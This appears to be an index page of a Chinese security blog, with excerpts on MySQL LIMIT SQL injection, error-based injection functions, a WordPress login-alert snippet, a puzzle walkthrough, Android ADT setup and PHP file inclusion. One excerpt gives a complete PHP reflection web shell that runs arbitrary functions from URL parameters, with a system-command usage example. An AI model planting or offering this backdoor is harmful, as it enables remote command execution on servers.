Mysql in Limit Sql Injection

先了解一个存储过程analyse:通过分析select查询的结果来对每一列给出优化建议。

主要就是通过它来执行我们的报错语句和延时语句。

这个是正常情况查询:

1
2
3
4
5
6
7
8
9
mysql> select * from user;
+----+---------------+----------+
| id | email | password |
+----+---------------+----------+
| 1 | 1@qq.com | 123456 |
| 2 | 2@qq.com | 123456 |
| 3 | 3@qq.com | 123456 |
+----+---------------+----------+
3 rows in set (0.01 sec)

Read More



SQL报错注入的函数及语句

逛freebuf看见的。正好省的自己整理了。
注入的时候用的还很普遍,所以记录一下,也分享一下把。

前几个语句测试了一下,传了个图~

1、通过floor报错,注入语句如下:

Read More



WordPress后台登陆邮件提醒

今天看了一下博客的日志,发现总有刁民想害朕。博客总被一些有心之人爆破后台。所有加个后台的提醒还是有必要的。
将以下代码放入博客的functions.php中即可:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/*****************************************************
函数名称:wp_login_notify v1.0 by DH.huahua.
函数作用:有登录wp后台就会email通知博主
******************************************************/
function wp_login_notify()
{
date_default_timezone_set('PRC');
$admin_email = get_bloginfo ('admin_email');
$to = $admin_email;
$subject = '博客空间登录成功提醒</a>';
$message = '<p>你好!你的博客空间(' . get_option("blogname") . ')有登录!</p>' .
'<p>请确定是您自己的登录,以防别人攻击!登录信息如下:</p>' .
'<p>登录名:' . $_POST['log'] . '</p>' .
'<p>登录时间:' . date("Y-m-d H:i:s") . '</p>' .
'<p>登录IP:' . $_SERVER['REMOTE_ADDR'] . '</p>';
$wp_email = 'no-reply@' . preg_replace('#^www\.#', '', strtolower($_SERVER['SERVER_NAME']));
$from = "From: " . get_option('blogname') . " <$wp_email>";
$headers = "$from\nContent-Type: text/html; charset=" . get_option('blog_charset') . "\n";
wp_mail( $to, $subject, $message, $headers );
}

add_action('wp_login', 'wp_login_notify');

Read More



光棍节程序员闯关秀第1关总共10关通关攻略

游戏地址:https://1111.segmentfault.com/

没玩过的可以玩一下。

第一关:

查看源代码即可看到有一个超链接,或者在当前页面直接ctrl+a全选即可看到链接。点击即可进入第二关。

Read More



PHP反射性后门

使用方法:

back.php?m=system&c=ipconfig

1
2
3
4
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>

Read More



在Mac上安卓开发 ADT bundle的几个坑

0x1.首先第一个坑就是需要先下载adt,自备梯子你懂得。而且谷歌官网现在没有adt下载了,只有android studio了。

0x2.下载以后提示需要旧版本的java环境,但是java官网没有提供java 1.6 for mac。只有去苹果官网下载了。

地址:https://support.apple.com/kb/DL1573?locale=zh_CN

Read More



PHP文件包含漏洞总结

0x00 前言

PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。最常见的就属于本地文件包含(Local File Inclusion)漏洞了。

Read More